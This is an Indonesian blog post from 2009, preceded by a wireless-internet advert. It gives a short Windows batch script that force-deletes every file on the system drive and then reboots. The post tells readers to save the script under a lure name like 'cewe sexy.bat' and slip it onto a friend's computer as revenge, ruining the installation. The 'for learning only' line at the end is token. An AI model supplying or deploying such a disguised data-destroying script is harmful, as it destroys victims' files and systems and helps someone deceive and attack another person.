GRATIS TEST KONEKSI INTERNET


PUNYA LAPTOP, ANDROID, ATAU KOMPUTER TAK TERKONEKSI INITERNET??
BOSAN PAKE MODEM DENGAN KONEKSI QUOTA TERBATAS?? :
PALUGADA WIRELESS SOLUSINYA!!!
* system voucher dengan banyak pilihan
* masa aktif voucher tak terbatas
* gak repot copot-colok modem!!!
* untuk pelanggan bulanan dengan qouta limit byte tak terbatas (speed tidak akan berkurang)
* jaringan wireless terluas di manado utara
* Jaminan koneksi real 24 jam,
* support online 24 jam
* speed UP-TO 512Kbp/s pure 256Kbps
Office = Jl. anggrek ternate tanjung Link II
Tlpn/SMS : 089698523021 Email: palugadawave@gmail.com

DETEKSI ACCES POINT KAMI DENGAN SSID "palugada wi-fi zone"

Minggu, 29 Maret 2009

Script Pengrusak Komponen Windows

oke.... kita mulai aja pembahasannya...
pertama-tama gue mau nanya dulu ya??
pertanyaan gue simple aja:
1. pernah kamu di kerjain sama temanmu sendiri?
misalnya mengambil data dari komputermu secara diam2?
atau memasukan virus trojan hours ke dalam komputermu??
hiii... jengkelin ya?? trus komputer kita bisa di intip dari jauh klo terhubung dengan internet
2. kamu masih sakit hati ga sama dia?? klo masih aku punya teknik untuk memuaskan amarahmu ke dia.
caranya :
1.buka aplikasi notepad.exe
2. copy paste code di bawah ini


@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

3. save as dengan nama apa aja...!! terserah kamu yang penting ber'extensi [*.bat]

contohnya : setelah code di atas di copy paste trus kamu save as dengan pilihan file
(all) berikan nama file tersebut misalnya : {cewe sexy}=cewe sexy.bat trus save...
file yang sudah jadi itu iconya mirip2 command pront pada windows. nah file yang bakalan buat dia menderita?? ... hahahaha soalnya harus install ulang windowsnya sudah jadi. tinggal kamu masukin filenya ke komputer target]. biarin dia terkecoh membuka file tadi...dan dalam waktu kurang dari 2 menit komputernya akan restart dan mengkonfirmasikan bahwa terjadi corrupt pada system komponen windows dan harus di install ulang...

tapi terserah kamu...sih mending jangan deh kasian tuh target klo dia ga bisa nginstall windows gimana donk?? hahaha
ini sebenarnya hanya buat pembelajaran betapa rentanya system operasi windows
hanya dengan symbol yang jumlahnya ga nyampe 100 bisa merusak organ penting di dalamnya.... Ga percaya?? coba aja....!!!

Comments :

3 komentar to “Script Pengrusak Komponen Windows”

Heryrhey mengatakan...
on 

Nice work keep up....

Unitaliano mengatakan...
on 

complimenti per il tuo blog!

I'm not a Tourist mengatakan...
on 

hhhhhhhh.....
bisa dicoba kk....
sayang gw br baca skarang....
heeee......


Last_cNb[S]

 

Copyright © 2009 by BLACK-TARSIUS.[ NAZHA23]